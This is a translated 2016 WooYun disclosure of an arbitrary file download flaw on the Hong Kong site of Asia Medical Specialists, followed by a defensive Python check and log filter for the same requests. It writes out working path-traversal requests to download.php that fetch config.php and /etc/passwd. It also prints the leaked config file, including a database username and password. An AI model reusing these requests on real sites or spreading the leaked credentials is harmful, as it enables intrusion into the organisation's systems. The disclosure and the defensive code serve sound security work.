
Vulnerability summary

Defect ID: wooyun-2016-0169166

Title: 亞洲專科醫生 (Asia Medical Specialists) design flaw: arbitrary file download (Hong Kong)

Vendor: 亞洲專科醫生 (Asia Medical Specialists)

Author: 路人甲

Submitted: 2016-01-13 12:02

Fixed: 2016-02-27 11:49

Published: 2016-02-27 11:49

Vulnerability type: Design flaw / logic error

Severity: Medium

Self-assessed Rank: 10

Status: Handed over to a third-party partner organisation (HKCERT, Hong Kong internet emergency response coordination centre) for handling

Source: http://www.wooyun.org. For questions or assistance, contact [email protected]



Vulnerability details

Disclosure status:

2016-01-13: Details sent to the vendor; awaiting vendor handling
2016-01-14: Vendor confirmed; details disclosed to the vendor only
2016-01-24: Details disclosed to core white hats and experts in the relevant field
2016-02-03: Details disclosed to regular white hats
2016-02-13: Details disclosed to intern white hats
2016-02-27: Details disclosed to the public

Brief description:

As in the title.

Detailed description:

Target: http://**.**.**.**
Constructed request:

http://**.**.**.**/eng/download.php?file=/eng/download.php


1.png


Configuration file:

http://**.**.**.**/eng/download.php?file=/include/config.php


Contents of config.php:

// Database
// Choose the database to be used
define('DB_TYPE', 'mysql');
// Web Site Name
define('SITENAME', 'asia medical specialists');
// Database Hostname
// Hostname of the database server. If you are unsure, 'localhost' works in most cases.
define('DB_HOST', 'localhost');
// Database Username
// Your database user account on the host
define('DB_USER', 'ams');
// Database Password
// Password for your database user account
define('DB_PASS', 'cl2cl2');
// Database Name
// The name of database on the host. The installer will attempt to create the database if not exist
define('DB_NAME', 'ams');
// Use persistent connection? (Yes=true No=false)
// Default is 'Yes'. Choose 'Yes' if you are unsure.
define('DB_PCONNECT', false);
// facilitate sending gz-encoded data to web browsers that support compressed web pages
// define('GZIP_COMPRESSION', true);
define('GZIP_COMPRESSION', true);
// SMTP server
define('SMTP', '**.**.**.**');
// Administrator Name
// Name of site administrator
define('SYSTEM_MAIL_SENDER', 'asiamedical specialists');
// Administrator Email
// Email address of site administrator
define('SYSTEM_MAIL_ADDRESS', 'info@**.**.**.**');
// Mail path for templated email
define('MAIL_PATH', '/mail/');
// Number of rows to display each page
define('NUM_ROWS', '20');
// Number of rows to display in article page
define('NUM_ROWS_ARTICLE', '10');
// Current date and time in HKT timezone
define('TIMEZONE', 8);
define('NOW', gmdate('Y-m-d H:i:s', time() + TIMEZONE * 3600));
define('TABLE_ADMIN', 'admins');
define('TABLE_MENU', 'menus');
define('TABLE_PAGE', 'pages');
define('TABLE_PAGEXMENU', 'pagesxmenus');
define('TABLE_NEWS', 'news');
define('TABLE_CAT', 'categories');
define('TABLE_ARTICLE', 'articles');
define('TABLE_ARTICLEXCAT', 'articlesxcategories');
define('TABLE_ARTICLEXNEWS', 'articlesxnews');
define('TABLE_BANNER', 'banners');
define('TABLE_BANNERXMENU', 'bannersxmenus');
define('TABLE_ENROLL', 'enrollments');
define('TABLE_PROMOTION', 'promotion');
define('TABLE_POPUP', 'popup');
define('TABLE_CROSS_LINK_BANNER', 'link_banner');
define('TABLE_SUPPLEMENTARY', 'supplementary');
define('TABLE_DOCTORS_SPECIALTY', 'doctors_specialty');
define('TABLE_DOCTORS', 'doctors');
define('TABLE_CLINIC_LOCATION','clinic_location');
define('TABLE_SUBSCRIPT','subscription_box');
define('TABLE_TERMS','terms');


/etc/passwd

http://**.**.**.**/eng/download.php?file=/../../../../etc/passwd


Contents of passwd:


Proof of vulnerability:

1.png



Remediation:

..
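As an added example (not code from the report or from the vendor's site), the check a download.php-style handler needs before serving its `file` parameter, together with a log filter that flags the three requests quoted above. The download root, the extension allowlist, and the access-log lines are constructed for this example.

```python
"""Added example (not the report's or the vendor's code): confine a
download.php-style ``file`` parameter to an allowlisted directory and flag
the requests quoted in the report.  Root, extensions and logs are constructed."""
import posixpath
import re
from typing import List, Optional
from urllib.parse import parse_qs, urlsplit

# Assumed: downloads may only come from this directory, and only these types.
DOWNLOAD_ROOT = "/var/www/html/eng/files"
ALLOWED_EXT = {".pdf", ".jpg", ".png", ".doc"}


def resolve_download(requested: str, root: str = DOWNLOAD_ROOT) -> Optional[str]:
    """Return the absolute path to serve, or None when the request must be refused.

    ``requested`` is the already URL-decoded ``file`` value, as PHP's $_GET would
    hand it over.  The check is lexical (no filesystem access) so it is testable
    offline: reject NUL bytes, anchor the value under the download root rather
    than under '/', collapse '.' and '..', then require the result to stay
    strictly inside the root and to carry an allowlisted extension.
    """
    if not requested or "\0" in requested:
        return None
    root_norm = posixpath.normpath(root)
    # A leading '/' means "relative to the download root", never "/".
    candidate = posixpath.normpath(posixpath.join(root_norm, requested.lstrip("/")))
    if not candidate.startswith(root_norm + "/"):
        return None  # '..' segments escaped the download root
    if posixpath.splitext(candidate)[1].lower() not in ALLOWED_EXT:
        return None  # source files such as config.php are never downloadable
    return candidate


# Request field of a combined-format access log: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')


def flag_download_requests(log_lines: List[str]) -> List[str]:
    """Return the ``file`` values of download.php requests that fail resolve_download.

    Running the same check over access logs turns the mitigation into a
    detection: any value the hardened handler would refuse is worth an alert.
    """
    flagged = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if match is None:
            continue
        parts = urlsplit(match.group("target"))
        if not parts.path.endswith("/download.php"):
            continue
        # parse_qs URL-decodes once, matching what the PHP script receives
        for value in parse_qs(parts.query, keep_blank_values=True).get("file", []):
            if resolve_download(value) is None:
                flagged.append(value)
    return flagged


# Constructed log lines (RFC 5737 addresses) replaying the report's three
# requests plus two benign ones.
SAMPLE_LOG = [
    '203.0.113.5 - - [13/Jan/2016:12:02:11 +0800] "GET /eng/download.php?file=/eng/download.php HTTP/1.1" 200 1830',
    '203.0.113.5 - - [13/Jan/2016:12:02:40 +0800] "GET /eng/download.php?file=/include/config.php HTTP/1.1" 200 2211',
    '203.0.113.5 - - [13/Jan/2016:12:03:02 +0800] "GET /eng/download.php?file=/../../../../etc/passwd HTTP/1.1" 200 9034',
    '198.51.100.7 - - [13/Jan/2016:12:05:19 +0800] "GET /eng/download.php?file=brochure.pdf HTTP/1.1" 200 51200',
    '198.51.100.7 - - [13/Jan/2016:12:06:00 +0800] "GET /eng/index.php HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for value in flag_download_requests(SAMPLE_LOG):
        print("refused:", value)
```

Because the check is purely lexical, pair it with a real-path check on the server once the file is opened; the lexical pass is what makes the rule cheap to run over logs.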

Copyright notice: when reposting, credit the source 路人甲@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2016-01-14 16:52

Vendor reply:

The incident has been reported to the relevant organisation.

Latest status:

None yet